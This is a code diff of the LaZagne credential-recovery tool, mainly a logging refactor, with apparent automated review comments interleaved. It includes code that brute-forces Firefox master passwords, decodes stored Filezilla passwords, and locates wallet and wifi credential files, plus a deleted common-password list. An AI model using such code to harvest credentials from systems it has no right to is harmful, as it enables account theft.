diff --git a/CHANGELOG b/CHANGELOG index 875bc922..3bf92541 100644 --- a/CHANGELOG +++ b/CHANGELOG @@ -1,3 +1,16 @@ +LaZagne 0.5 (20/05/2015) +- For Windows / Linux + * 2 levels of verbosity added for debugs + * try / except more verbose depending on the verbosity levels + * dico file moved from browsers to config repository (used for dictionary attack) + * new Filezilla versions managed + +- Only Windows + * check weak passwords (logins equal to password) for windows account when hashes (nthash) have been found + * function to write the output modified on windows module + * WConio replaced by colorama for the window color + * Skype: try a dictionary attack (500 famous password) when the hash has been retrieved + LaZagne 0.4 (12/05/2015) - For Linux * Kwallet module implemented (by quentin hardy) diff --git a/Linux/src/LaZagne.py b/Linux/src/LaZagne.py index 4d4c3314..bb6f6a02 100644 --- a/Linux/src/LaZagne.py +++ b/Linux/src/LaZagne.py @@ -1,4 +1,4 @@ -#!/usr/bin/python +# !/usr/bin/python ############################################################################## # # @@ -45,9 +45,9 @@ def output(): def verbosity(): # write on the console + debug file - if args['verbose']==0: level=logging.INFO - elif args['verbose'] >= 1: level=logging.DEBUG - elif args['verbose']>=2: level=logging.WARNING + if args['verbose']==0: level=logging.CRITICAL + elif args['verbose'] == 1: level=logging.INFO + elif args['verbose']>=2: level=logging.DEBUG FORMAT = "%(message)s" formatter = logging.Formatter(fmt=FORMAT) @@ -55,7 +55,9 @@ def verbosity(): stream.setFormatter(formatter) root = logging.getLogger() root.setLevel(level) - root.handlers = [] + # if other logging are set + for r in root.handlers: + r.setLevel(logging.CRITICAL) root.addHandler(stream) del args['verbose'] diff --git a/Linux/src/config/constant.py b/Linux/src/config/constant.py index 45e15177..051646c5 100644 --- a/Linux/src/config/constant.py +++ b/Linux/src/config/constant.py 
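Review bot: The first hunk of Linux/src/LaZagne.py turns the interpreter line into `# !/usr/bin/python`, which is no longer a shebang because the file has to start with the two bytes `#!`. Launching the script directly (`./LaZagne.py`) would then hand it to the shell instead of Python. Keep the original `#!/usr/bin/python`; if the space came from a comment-style formatter, exempt line 1 from that rule.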
@@ -2,7 +2,7 @@ class constant(): folder_name = 'results' MAX_HELP_POSITION = 27 - CURRENT_VERSION = 0.3 + CURRENT_VERSION = 0.5 output = None file_logger = None verbose = False diff --git a/Linux/src/config/debug.py b/Linux/src/config/debug.py deleted file mode 100644 index 12781b26..00000000 --- a/Linux/src/config/debug.py +++ /dev/null @@ -1,49 +0,0 @@ -import logging -import constant -from color import bcolors - -def function_logger(console_level, file_level = None): - function_name = 'debug' - logger = logging.getLogger(function_name) - logger.setLevel(logging.DEBUG) #By default, logs all messages - - fh = logging.FileHandler("{0}.log".format(function_name)) - fh.setLevel(file_level) - fh_format = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s') - fh.setFormatter(fh_format) - logger.addHandler(fh) - - return logger - -def print_debug(error_level, message): - - b = bcolors() - - #if error_level == 'ERROR': - #print b.FAIL + '[ERROR] ' + message + b.ENDC - #if constant.verbose: - #constant.file_logger.error(message) - # - #elif error_level == 'WARNING': - #print b.FAIL + '[WARNING] ' + message + b.ENDC - #if constant.verbose: - #constant.file_logger.warning(message) - # - #elif error_level == 'INFO': - #print '[INFO] ' + message - #if constant.verbose: - #constant.file_logger.info(message) - # - #elif error_level == 'OK': - #print b.OK + message + b.ENDC - #if constant.verbose: - #constant.file_logger.debug(message) - # - #elif error_level == 'DEBUG': - #if constant.verbose: - #constant.file_logger.debug(message) - - - - - diff --git a/Linux/src/config/header.py b/Linux/src/config/header.py index 5d2dc052..7f292559 100644 --- a/Linux/src/config/header.py +++ b/Linux/src/config/header.py 
@@ -13,18 +13,13 @@ def first_title(self): print '|====================================================================|' print bcolors().ENDC - + + # print the title if no logging level has been set def title(self, title): - print bcolors().TITLE - print "------------------- " + title + " passwords -----------------" - print bcolors().ENDC - - # info option for the logging - def title_info(self, title): b = bcolors() - logging.info(b.TITLE + "------------------- " + title + " passwords -----------------\n" + b.ENDC) + print b.TITLE + "------------------- " + title + " passwords -----------------\n" + b.ENDC - # debug option for the logging - def title_debug(self, title): + # print the title if logging level is higher or equal to info + def title_info(self, title): b = bcolors() - logging.debug(b.TITLE + "------------------- " + title + " passwords -----------------\n" + b.ENDC ) \ No newline at end of file + logging.info(b.TITLE + "------------------- " + title + " passwords -----------------\n" + b.ENDC ) \ No newline at end of file diff --git a/Linux/src/config/write_output.py b/Linux/src/config/write_output.py index 9d2ba783..b5fb2fc0 100644 --- a/Linux/src/config/write_output.py +++ b/Linux/src/config/write_output.py 
@@ -53,16 +53,16 @@ def checks_write(values, category): def print_footer(): footer = '\n[+] %s passwords have been found.\n' % str(constant.nbPasswordFound) - if logging.getLogger().isEnabledFor(logging.DEBUG) == False: + if logging.getLogger().isEnabledFor(logging.INFO) == False: footer += 'For more information launch it again with the -v option\n' - logging.info(footer) + print footer # print output if passwords have been found def print_output(software_name, pwdFound): if pwdFound: # if the debug logging level is not apply => print the title - if logging.getLogger().isEnabledFor(logging.DEBUG) == False: - Header().title_info(software_name) + if logging.getLogger().isEnabledFor(logging.INFO) == False: + Header().title(software_name) toWrite = [] for pwd in pwdFound: @@ -76,7 +76,7 @@ def print_output(software_name, pwdFound): else: print_debug("OK", "Password found !!!") toWrite.append(pwd) - # Store all passwords found on a table => for dictionnary attack if masterpassword set + # Store all passwords found on a table => for dictionary attack if master password set constant.nbPasswordFound += 1 try: if password: 
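Review bot: In `print_output` (Linux/src/config/write_output.py) the comment `# if the debug logging level is not apply => print the title` is stale now that the test below it checks `logging.INFO`. Wording such as `# INFO logging is off, so the module title was not logged: print it here` would match the new condition. Both changed tests in this hunk would also read better as `if not logging.getLogger().isEnabledFor(logging.INFO):` than with `== False`. `print_output` continues past the end of this hunk.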
@@ -87,39 +87,44 @@ def print_output(software_name, pwdFound): pass for p in pwd.keys(): - logging.info("%s: %s" % (p, pwd[p])) + print '%s: %s' % (p, pwd[p]) print # write credentials into a text file checks_write(toWrite, software_name) else: - logging.debug("[!] No passwords found\n") + logging.info("[!] No passwords found\n") def print_debug(error_level, message): b = bcolors() - if error_level == 'ERROR': - logging.debug(b.FAIL + '[ERROR] ' + message + '\n' + b.ENDC) - - elif error_level == 'WARNING': - logging.debug(b.WARNING + '[WARNING] ' + message + '\n' + b.ENDC) - - elif error_level == 'INFO': - logging.debug('[INFO] ' + message + '\n') - + + # print when password is found + if error_level == 'OK': + print b.OK + message + b.ENDC + # print when password is not found elif error_level == 'FAILED': - logging.info(b.FAIL + message + b.ENDC) + print b.FAIL + message + b.ENDC + + # print messages depending of their criticism + elif error_level == 'CRITICAL': + logging.error(b.FAIL + '[CRITICAL] ' + message + '\n' + b.ENDC) + + elif error_level == 'ERROR': + logging.error(b.FAIL + '[ERROR] ' + message + '\n' + b.ENDC) + + elif error_level == 'WARNING': + logging.warning(b.WARNING + message + '\n' + b.ENDC) - # print when password is found - elif error_level == 'OK': - logging.info(b.OK + message + b.ENDC) - elif error_level == 'DEBUG': logging.debug(message + '\n') + + elif error_level == 'INFO': + logging.info(message + '\n') else: - logging.debug('[%s] %s' % (error_level, message)) + logging.info('[%s] %s' % (error_level, message)) # --------------------------- End of output functions --------------------------- \ No newline at end of file diff --git a/Linux/src/softwares/browsers/dico.py b/Linux/src/softwares/browsers/dico.py deleted file mode 100644 index c376d191..00000000 --- a/Linux/src/softwares/browsers/dico.py +++ /dev/null 
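Review bot: The new 'CRITICAL' branch of `print_debug` calls `logging.error(...)`, so a message tagged CRITICAL is emitted at ERROR level. The LaZagne.py hunk of this commit sets the root logger to `logging.CRITICAL` when no -v is given, so these messages would be filtered out in the default mode, presumably the opposite of what the tag is meant for. Use `logging.critical(b.FAIL + '[CRITICAL] ' + message + '\n' + b.ENDC)` in that branch. Tags without a branch of their own, such as 'FIND' and 'ATTACK' used in mozilla.py, now fall through to `logging.info`, which is worth a line in the function's comment.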
@@ -1,505 +0,0 @@ - -def get_dico(): - return [ - "password", - "123456", - "12345678", - "1234", - "qwerty", - "12345", - "dragon", - "pussy", - "baseball", - "football", - "letmein", - "monkey", - "696969", - "abc123", - "mustang", - "michael", - "shadow", - "master", - "jennifer", - "111111", - "2000", - "jordan", - "superman", - "harley", - "1234567", - "fuckme", - "hunter", - "fuckyou", - "trustno1", - "ranger", - "buster", - "thomas", - "tigger", - "robert", - "soccer", - "fuck", - "batman", - "test", - "pass", - "killer", - "hockey", - "george", - "charlie", - "andrew", - "michelle", - "love", - "sunshine", - "jessica", - "asshole", - "6969", - "pepper", - "daniel", - "access", - "123456789", - "654321", - "joshua", - "maggie", - "starwars", - "silver", - "william", - "dallas", - "yankees", - "123123", - "ashley", - "666666", - "hello", - "amanda", - "orange", - "biteme", - "freedom", - "computer", - "sexy", - "thunder", - "nicole", - "ginger", - "heather", - "hammer", - "summer", - "corvette", - "taylor", - "fucker", - "austin", - "1111", - "merlin", - "matthew", - "121212", - "golfer", - "cheese", - "princess", - "martin", - "chelsea", - "patrick", - "richard", - "diamond", - "yellow", - "bigdog", - "secret", - "asdfgh", - "sparky", - "cowboy", - "camaro", - "anthony", - "matrix", - "falcon", - "iloveyou", - "bailey", - "guitar", - "jackson", - "purple", - "scooter", - "phoenix", - "aaaaaa", - "morgan", - "tigers", - "porsche", - "mickey", - "maverick", - "cookie", - "nascar", - "peanut", - "justin", - "131313", - "money", - "horny", - "samantha", - "panties", - "steelers", - "joseph", - "snoopy", - "boomer", - "whatever", - "iceman", - "smokey", - "gateway", - "dakota", - "cowboys", - "eagles", - "chicken", - "dick", - "black", - "zxcvbn", - "please", - "andrea", - "ferrari", - "knight", - "hardcore", - "melissa", - "compaq", - "coffee", - "booboo", - "bitch", - "johnny", - "bulldog", - "xxxxxx", - "welcome", - "james", - "player", - "ncc1701", - 
"wizard", - "scooby", - "charles", - "junior", - "internet", - "bigdick", - "mike", - "brandy", - "tennis", - "blowjob", - "banana", - "monster", - "spider", - "lakers", - "miller", - "rabbit", - "enter", - "mercedes", - "brandon", - "steven", - "fender", - "john", - "yamaha", - "diablo", - "chris", - "boston", - "tiger", - "marine", - "chicago", - "rangers", - "gandalf", - "winter", - "bigtits", - "barney", - "edward", - "raiders", - "porn", - "badboy", - "blowme", - "spanky", - "bigdaddy", - "johnson", - "chester", - "london", - "midnight", - "blue", - "fishing", - "000000", - "hannah", - "slayer", - "11111111", - "rachel", - "sexsex", - "redsox", - "thx1138", - "asdf", - "marlboro", - "panther", - "zxcvbnm", - "arsenal", - "oliver", - "qazwsx", - "mother", - "victoria", - "7777777", - "jasper", - "angel", - "david", - "winner", - "crystal", - "golden", - "butthead", - "viking", - "jack", - "iwantu", - "shannon", - "murphy", - "angels", - "prince", - "cameron", - "girls", - "madison", - "wilson", - "carlos", - "hooters", - "willie", - "startrek", - "captain", - "maddog", - "jasmine", - "butter", - "booger", - "angela", - "golf", - "lauren", - "rocket", - "tiffany", - "theman", - "dennis", - "liverpoo", - "flower", - "forever", - "green", - "jackie", - "muffin", - "turtle", - "sophie", - "danielle", - "redskins", - "toyota", - "jason", - "sierra", - "winston", - "debbie", - "giants", - "packers", - "newyork", - "jeremy", - "casper", - "bubba", - "112233", - "sandra", - "lovers", - "mountain", - "united", - "cooper", - "driver", - "tucker", - "helpme", - "fucking", - "pookie", - "lucky", - "maxwell", - "8675309", - "bear", - "suckit", - "gators", - "5150", - "222222", - "shithead", - "fuckoff", - "jaguar", - "monica", - "fred", - "happy", - "hotdog", - "tits", - "gemini", - "lover", - "xxxxxxxx", - "777777", - "canada", - "nathan", - "victor", - "florida", - "88888888", - "nicholas", - "rosebud", - "metallic", - "doctor", - "trouble", - "success", - "stupid", - 
"tomcat", - "warrior", - "peaches", - "apples", - "fish", - "qwertyui", - "magic", - "buddy", - "dolphins", - "rainbow", - "gunner", - "987654", - "freddy", - "alexis", - "braves", - "cock", - "2112", - "1212", - "cocacola", - "xavier", - "dolphin", - "testing", - "bond007", - "member", - "calvin", - "voodoo", - "7777", - "samson", - "alex", - "apollo", - "fire", - "tester", - "walter", - "beavis", - "voyager", - "peter", - "porno", - "bonnie", - "rush2112", - "beer", - "apple", - "scorpio", - "jonathan", - "skippy", - "sydney", - "scott", - "red123", - "power", - "gordon", - "travis", - "beaver", - "star", - "jackass", - "flyers", - "boobs", - "232323", - "zzzzzz", - "steve", - "rebecca", - "scorpion", - "doggie", - "legend", - "ou812", - "yankee", - "blazer", - "bill", - "runner", - "birdie", - "bitches", - "555555", - "parker", - "topgun", - "asdfasdf", - "heaven", - "viper", - "animal", - "2222", - "bigboy", - "4444", - "arthur", - "baby", - "private", - "godzilla", - "donald", - "williams", - "lifehack", - "phantom", - "dave", - "rock", - "august", - "sammy", - "cool", - "brian", - "platinum", - "jake", - "bronco", - "paul", - "mark", - "frank", - "heka6w2", - "copper", - "billy", - "cumshot", - "garfield", - "willow", - "cunt", - "little", - "carter", - "slut", - "albert", - "69696969", - "kitten", - "super", - "jordan23", - "eagle1", - "shelby", - "america", - "11111", - "jessie", - "house", - "free", - "123321", - "chevy", - "bullshit", - "white", - "broncos", - "horney", - "surfer", - "nissan", - "999999", - "saturn", - "airborne", - "elephant", - "marvin", - "shit", - "action", - "adidas", - "qwert", - "kevin", - "1313", - "explorer", - "walker", - "police", - "christin", - "december", - "benjamin", - "wolf", - "sweet", - "therock", - "king", - "online", - "dickhead", - "brooklyn", - "teresa", - "cricket", - "sharon", - "dexter", - "racing", - "penis", - "gregory", - "0000", - "teens", - "redwings", - "dreams", - "michigan", - "hentai", - "magnum", - 
"87654321", - "nothing", - "donkey", - "trinity", - "digital", - "333333", - "stella", - "cartman", - "guinness", - "123abc", - "speedy", - "buffalo", - "kitty"] - diff --git a/Linux/src/softwares/browsers/mozilla.py b/Linux/src/softwares/browsers/mozilla.py index 3b00c01d..baa45697 100644 --- a/Linux/src/softwares/browsers/mozilla.py +++ b/Linux/src/softwares/browsers/mozilla.py @@ -9,7 +9,7 @@ import sqlite3 import json import shutil -from dico import get_dico +from config.dico import get_dico import itertools from config.header import Header from config.constant import * @@ -27,10 +27,16 @@ def __init__(self, db): global database_find self.db = db if os.path.isfile(db): - database_find = True + # check if the database is not empty + f = open(db, 'r') + tmp = f.read() + if tmp: + database_find = True + f.close() def __iter__(self): pass + def done(self): pass @@ -147,8 +153,8 @@ def initialize_libnss(self, list_libnss, profile): self.libnss = CDLL(lib) if self.libnss.NSS_Init(profile) == 0: return True - except: - pass + except Exception,e: + print_debug('ERROR', '{0}'.format(e)) return False def found_libnss(self): @@ -214,7 +220,8 @@ def save_db(self, userpath): dst_db = relative_path + os.sep + dbname shutil.copyfile(ori_db, dst_db) print_debug('INFO', '%s has been copied here: %s' % (dbname, dst_db)) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) print_debug('ERROR', '%s has not been copied' % dbname) try: @@ -223,7 +230,8 @@ def save_db(self, userpath): dst_db = relative_path + os.sep + dbname shutil.copyfile(ori_db, dst_db) print_debug('INFO', '%s has been copied here: %s' % (dbname, dst_db)) - except: + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) print_debug('ERROR', '%s has not been copied' % dbname) # ------------------------------ Master Password Functions ------------------------------ 
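Review bot: The emptiness check added to `__init__` in Linux/src/softwares/browsers/mozilla.py (hunk at -27) reads the whole credentials file into memory only to test whether it has content, and the handle is not closed if `read()` raises. `os` is already used on the line above, so `if os.path.getsize(db) > 0: database_find = True` gives the same answer without opening the file. If the open is kept, `with open(db, 'rb') as f:` would guarantee the close and avoid a text-mode read of what may be a binary SQLite file. This constructor only ever sets `database_find` to True, so resetting the flag is left entirely to the caller.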
@@ -255,7 +263,7 @@ def found_masterpassword(self): if 'm' in self.toCheck: print_debug('ATTACK', 'Check the password entered manually !') if self.is_masterpassword_correct(self.manually_pass): - print_debug('FIND', 'Master password found: %s\n' % self.manually_pass) + print_debug('FIND', 'Master password found: %s' % self.manually_pass) return True else: print_debug('WARNING', 'The Master password entered is not correct') @@ -275,14 +283,15 @@ def found_masterpassword(self): with open(self.dictionnary_path) as f: for p in f: if self.is_masterpassword_correct(p.strip()): - print_debug('FIND', 'Master password found: %s\n' % p.strip()) + print_debug('FIND', 'Master password found: %s' % p.strip()) return True except (KeyboardInterrupt, SystemExit): print 'INTERRUPTED!' print_debug('DEBUG', 'Dictionnary attack interrupted') - except: - pass + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) + print_debug('WARNING', 'The Master password has not been found using the dictionnary attack') # 500 most used passwords @@ -293,7 +302,7 @@ def found_masterpassword(self): for word in wordlist: if self.is_masterpassword_correct(word): - print_debug('FIND', 'Master password found: %s\n' % word.strip()) + print_debug('FIND', 'Master password found: %s' % word.strip()) return True print_debug('WARNING', 'No password has been found using the default list') 
@@ -311,27 +320,31 @@ def found_masterpassword(self): for i in itertools.product(tab, repeat=current): word = ''.join(map(str,i)) if self.is_masterpassword_correct(word): - print_debug('FIND', 'Master password found: %s\n' % word.strip()) + print_debug('FIND', 'Master password found: %s' % word.strip()) return True current+= 1 except (KeyboardInterrupt, SystemExit): print 'INTERRUPTED!' print_debug('INFO', 'Dictionnary attack interrupted') - except: - pass + except Exception,e: + print_debug('DEBUG', '{0}'.format(e)) + print_debug('WARNING', 'No password has been found using the brute force attack') # ------------------------------ End of Master Password Functions ------------------------------ # main function def run(self): + global database_find + database_find = False + self.manage_advanced_options() software_name = constant.mozilla_software specific_path = constant.specific_path # print the title - Header().title_debug(software_name) + Header().title_info(software_name) # get the installation path path = self.get_path(software_name) 
@@ -362,36 +375,42 @@ def run(self): pwdFound = [] for profile in profile_list: print_debug('INFO', 'Profile path found: %s' % profile) - + if self.initialize_libnss(list_libnss, profile): masterPwd = self.is_masterpasswd_set() - if masterPwd: - print_debug('WARNING', 'A masterpassword is used !!') - masterPwdFound = self.found_masterpassword() - if not masterPwd or masterPwdFound: - # check if passwors are stored on the Json format + # check if passwors are stored on the Json format + try: credentials = JsonDatabase(profile) - if not database_find: - # check if passwors are stored on the sqlite format - credentials = SqliteDatabase(profile) - - if not database_find: - print_debug('INFO', 'No credentials file found (logins.json or signons.sqlite) - or empty content') - + except: + database_find = False + + if not database_find: + # check if passwors are stored on the sqlite format try: - # decrypt passwords on the db - pwdFound+=self.decrypt(software_name, credentials) + credentials = SqliteDatabase(profile) except: - pass - - # if a master password is set (but not found), we save the db to bruteforce offline - elif masterPwd and not masterPwdFound and constant.output == 'txt': - self.save_db(profile) + database_find = False + + if database_find: + if masterPwd: + print_debug('WARNING', 'A masterpassword is used !!') + masterPwdFound = self.found_masterpassword() + + if not masterPwd or masterPwdFound: + try: + # decrypt passwords on the db + pwdFound+=self.decrypt(software_name, credentials) + except Exception,e: + print_debug('ERROR', '{0}'.format(e)) + + # if a master password is set (but not found), we save the db to bruteforce offline + elif masterPwd and not masterPwdFound and constant.output == 'txt': + self.save_db(profile) self.libnss.NSS_Shutdown() else: - print_debug('ERROR', 'Could not initialize the NSS library\n') + print_debug('ERROR', 'Could not initialize the NSS library') # print the results print_output(software_name, pwdFound) \ No newline at 
end of file diff --git a/Linux/src/softwares/browsers/opera.py b/Linux/src/softwares/browsers/opera.py index 19300c03..780922b9 100644 --- a/Linux/src/softwares/browsers/opera.py +++ b/Linux/src/softwares/browsers/opera.py @@ -16,7 +16,7 @@ def __init__(self): def run(self): # print the title - Header().title_debug('Opera') + Header().title_info('Opera') # retrieve opera folder path = self.get_path() diff --git a/Linux/src/softwares/chats/jitsi.py b/Linux/src/softwares/chats/jitsi.py index 69cdd7e3..7c186e3a 100644 --- a/Linux/src/softwares/chats/jitsi.py +++ b/Linux/src/softwares/chats/jitsi.py @@ -103,7 +103,7 @@ def decrypt_password(self, encrypted_pass): # main function def run(self): # print the title - Header().title_debug('Jitsi') + Header().title_info('Jitsi') file_properties = self.get_path() if file_properties == 'JITSI_NOT_EXISTS': diff --git a/Linux/src/softwares/chats/pidgin.py b/Linux/src/softwares/chats/pidgin.py index 9296790e..e8ea571c 100644 --- a/Linux/src/softwares/chats/pidgin.py +++ b/Linux/src/softwares/chats/pidgin.py @@ -36,7 +36,7 @@ def check_if_pidgin_started(self): def run(self): # print the title - Header().title_debug('Pidgin') + Header().title_info('Pidgin') pwdFound = [] try: diff --git a/Linux/src/softwares/databases/dbvis.py b/Linux/src/softwares/databases/dbvis.py index 10271aa0..0cfa000d 100644 --- a/Linux/src/softwares/databases/dbvis.py +++ b/Linux/src/softwares/databases/dbvis.py @@ -69,8 +69,8 @@ def get_infos(self, path, passphrase, salt): password = self.decrypt(salt, ciphered_password, passphrase) values['Password'] = password passwordFound = True - except: - pass + except Exception,e: + print_debug('ERROR', '{0}'.format(e)) if 'UrlVariables' == e.tag: for el in e.getchildren(): @@ -103,7 +103,7 @@ def get_mainPath(self): def run(self): # print the title - Header().title_debug('DbVisualizer') + Header().title_info('DbVisualizer') mainPath = self.get_mainPath() 
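Review bot: In `run` (mozilla.py, hunk at -362) the two new `try: ... except:` blocks around `JsonDatabase(profile)` and `SqliteDatabase(profile)` are bare, so they also catch KeyboardInterrupt and hide why the open failed, unlike the `except Exception,e:` handlers added elsewhere in this commit. `except Exception,e:` with `print_debug('DEBUG', '{0}'.format(e))` before `database_find = False` keeps the behaviour and leaves a trace. The flag is a module global that this commit resets once at the top of `run` rather than per profile; if the constructors only ever set it to True, as the `__init__` hunk suggests, a profile without a credentials file would inherit True from the previous one, so `database_find = False` at the start of each loop iteration looks safer. The 'No credentials file found' message disappeared with the restructuring, and an `else:` on `if database_find:` could restore it.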
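Review bot: In `get_infos` (Linux/src/softwares/databases/dbvis.py, hunk at -69) the new handler `except Exception,e:` reuses the name `e`, which the context line right after it (`if 'UrlVariables' == e.tag:`) shows is the XML element being processed. In Python 2 the exception stays bound to that name after the handler, so once a decryption error is caught the following `e.tag` access is made on the exception object and raises AttributeError. Bind the exception to another name: `except Exception,err:` and `print_debug('ERROR', '{0}'.format(err))`. The enclosing loop starts outside the hunk, so confirm there that `e` is the loop variable.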
diff --git a/Linux/src/softwares/databases/sqldeveloper.py b/Linux/src/softwares/databases/sqldeveloper.py index 12795807..84bd4c38 100644 --- a/Linux/src/softwares/databases/sqldeveloper.py +++ b/Linux/src/softwares/databases/sqldeveloper.py @@ -135,7 +135,7 @@ def get_infos(self, path, passphrase, salt): def run(self): # print the title - Header().title_debug('SQL Developer') + Header().title_info('SQL Developer') mainPath = self.get_mainPath() diff --git a/Linux/src/softwares/databases/squirrel.py b/Linux/src/softwares/databases/squirrel.py index f1631077..75a7ccff 100644 --- a/Linux/src/softwares/databases/squirrel.py +++ b/Linux/src/softwares/databases/squirrel.py @@ -47,7 +47,7 @@ def parse_xml(self, xml_file): # Main function def run(self): # print the title - Header().title_debug('Squirrel') + Header().title_info('Squirrel') path = self.get_path() if path == 'Not_Found': diff --git a/Linux/src/softwares/sysadmin/env_variable.py b/Linux/src/softwares/sysadmin/env_variable.py index e5a4394d..806d5a01 100644 --- a/Linux/src/softwares/sysadmin/env_variable.py +++ b/Linux/src/softwares/sysadmin/env_variable.py @@ -14,7 +14,7 @@ def run(self): pwdFound = [] # print the title - Header().title_debug('Environnement variables') + Header().title_info('Environnement variables') # --------- http_proxy -------- tmp = '' diff --git a/Linux/src/softwares/sysadmin/filezilla.py b/Linux/src/softwares/sysadmin/filezilla.py index 166562ba..eb69e041 100644 --- a/Linux/src/softwares/sysadmin/filezilla.py +++ b/Linux/src/softwares/sysadmin/filezilla.py @@ -2,7 +2,7 @@ from config.header import Header from config.write_output import print_debug, print_output from config.moduleInfo import ModuleInfo -import os +import os, base64 class Filezilla(ModuleInfo): def __init__(self): 
@@ -11,7 +11,7 @@ def __init__(self): def run(self): # print the title - Header().title_debug('Filezilla') + Header().title_info('Filezilla') directory = '~/.filezilla' directory = os.path.expanduser(directory) @@ -35,8 +35,7 @@ def run(self): pwdFound = [] for i in range(len(interesting_xml_file)): - print_debug('INFO', interesting_xml_file[i]) - print_debug('INFO', info_xml_file[i] + '\n') + print_debug('INFO', '%s: %s' % (interesting_xml_file[i], info_xml_file[i])) xml_file = os.path.expanduser(directory + os.sep + interesting_xml_file[i]) @@ -62,7 +61,15 @@ def run(self): values['Login'] = s11.text if s11.tag == 'Pass': - values['Password'] = s11.text + try: + # if base64 encoding + if 'encoding' in s11.attrib: + if s11.attrib['encoding'] == 'base64': + values['Password'] = base64.b64decode(s11.text) + else: + values['Password'] = s11.text + except: + values['Password'] = s11.text # write credentials into a text file if len(values) != 0: diff --git a/Linux/src/softwares/wallet/gnome.py b/Linux/src/softwares/wallet/gnome.py index a020d872..7f67bf87 100644 --- a/Linux/src/softwares/wallet/gnome.py +++ b/Linux/src/softwares/wallet/gnome.py @@ -11,10 +11,10 @@ def __init__(self): def run(self): # print the title - Header().title_debug('Gnome keyring') + Header().title_info('Gnome keyring') if os.getuid() == 0: - print_debug('INFO', 'Do not run with root privileges)\n') + print_debug('WARNING', 'Do not run it with root privileges)\n') return try: import gnomekeyring diff --git a/Linux/src/softwares/wallet/kde.py b/Linux/src/softwares/wallet/kde.py index 101a2457..08890c6c 100644 --- a/Linux/src/softwares/wallet/kde.py +++ b/Linux/src/softwares/wallet/kde.py @@ -15,7 +15,7 @@ def __init__(self): ModuleInfo.__init__(self, 'kwallet', 'wallet', options) def run(self): - Header().title_debug("KWallet") + Header().title_info("KWallet") if os.getuid() == 0: print_debug('INFO', 'Do not run with root privileges)\n') 
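Review bot: In the `Pass` branch of `run` (Linux/src/softwares/sysadmin/filezilla.py, hunk at -62) the two nested tests share a single `else`, so one case leaves `values['Password']` unset whichever `if` the `else` belongs to (the indentation is not visible here): either an element with no `encoding` attribute, which is what the previous code handled, or one whose encoding is not base64. A single test, `if s11.attrib.get('encoding') == 'base64':`, followed by the existing `else:` covers both cases. The bare `except:` around it could then become `except Exception:` so that an interrupt is not swallowed.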
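Review bot: The reworded message in Linux/src/softwares/wallet/gnome.py, `'Do not run it with root privileges)\n'`, still carries a stray closing parenthesis, and the same check in kde.py (context line of the next file's hunk) keeps the old wording at level 'INFO'. The two modules therefore report the same condition with different text and at different levels. Suggest `print_debug('WARNING', 'Do not run it with root privileges\n')` in both places.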
diff --git a/Linux/src/softwares/wifi/wifi.py b/Linux/src/softwares/wifi/wifi.py index 5ec7d838..32ea1951 100644 --- a/Linux/src/softwares/wifi/wifi.py +++ b/Linux/src/softwares/wifi/wifi.py @@ -11,7 +11,7 @@ def __init__(self): def run(self): # print the title - Header().title_debug('Wifi (from Network Manager)') + Header().title_info('Wifi (from Network Manager)') directory = '/etc/NetworkManager/system-connections' if os.path.exists(directory): diff --git a/Linux/standalone/32bits/LaZagne-32bits b/Linux/standalone/32bits/LaZagne-32bits index c1580ad7..3d2330db 100755 Binary files a/Linux/standalone/32bits/LaZagne-32bits and b/Linux/standalone/32bits/LaZagne-32bits differ diff --git a/Linux/standalone/64bits/LaZagne-64bits b/Linux/standalone/64bits/LaZagne-64bits index 6f1aa860..2e176144 100755 Binary files a/Linux/standalone/64bits/LaZagne-64bits and b/Linux/standalone/64bits/LaZagne-64bits differ diff --git a/README.md b/README.md index 1c4ed03c..b66011ba 100644 --- a/README.md +++ b/README.md @@ -10,6 +10,8 @@ At this moment, it supports 22 Programs on Microsoft Windows and 12 on a Linux/U

The LaZagne project

+(*) used by many tools to store passwords: Chrome, Owncloud, Evolution, KMail, etc. + Usage ---- * Launch all modules @@ -71,23 +73,28 @@ Requirements To compile the source code, some external libraries are required. * For Windows - * WConio (for the Console colors) - * http://newcenturycomputers.net/projects/wconio.html - * http://newcenturycomputers.net/projects/download.cgi/WConio-1.5.win32-py2.7.exe + * colorama (for the Console colors) + * https://pypi.python.org/pypi/colorama * Python for Windows Extensions * http://sourceforge.net/projects/pywin32/ + * pycrypto + * pip install pycrypto + * Impacket (for Windows hashes + LSA Secrets) * https://github.com/CoreSecurity/impacket * For Linux - * None for Ubuntu 14.04 + * For Ubuntu 14.04 + * python-kde4 (Kwallet) + * Other distributions * Python 2.7 * argparse * Crypto - * dbus + * dbus (Pidgin) + * python-kde4 (Kwallet) ---- | __Alessandro ZANNI__ | diff --git a/Windows/src/LaZagne/config/constant.py b/Windows/src/LaZagne/config/constant.py index 47ff08a7..c1914dd4 100644 --- a/Windows/src/LaZagne/config/constant.py +++ b/Windows/src/LaZagne/config/constant.py @@ -2,7 +2,7 @@ class constant(): folder_name = 'results' MAX_HELP_POSITION = 27 - CURRENT_VERSION = 0.4 + CURRENT_VERSION = 0.5 output = None file_logger = None diff --git a/Windows/src/LaZagne/config/header.py b/Windows/src/LaZagne/config/header.py index 1abd927f..ef7d24f3 100644 --- a/Windows/src/LaZagne/config/header.py +++ b/Windows/src/LaZagne/config/header.py @@ -1,10 +1,13 @@ -import WConio import logging +from colorama import init, Fore, Back, Style class Header(): + def __init__(self): + init() # for colorama + def first_title(self): - WConio.textcolor(WConio.WHITE) - print + init() + print Style.BRIGHT + Fore.WHITE print '|====================================================================|' print '| |' print '| The LaZagne Project |' 
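Review bot: In Windows/src/LaZagne/config/header.py (hunk at -1) colorama's `init()` is called both in the new `__init__` and again at the top of `first_title`, and every `Header()` construction repeats it. One call at module import, or only the one in `__init__`, would be enough; a short comment such as `# enable ANSI colour handling on the Windows console` would say more than `# for colorama`. `Back` is imported but not used in the hunks visible here, so it can probably be dropped from the import.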
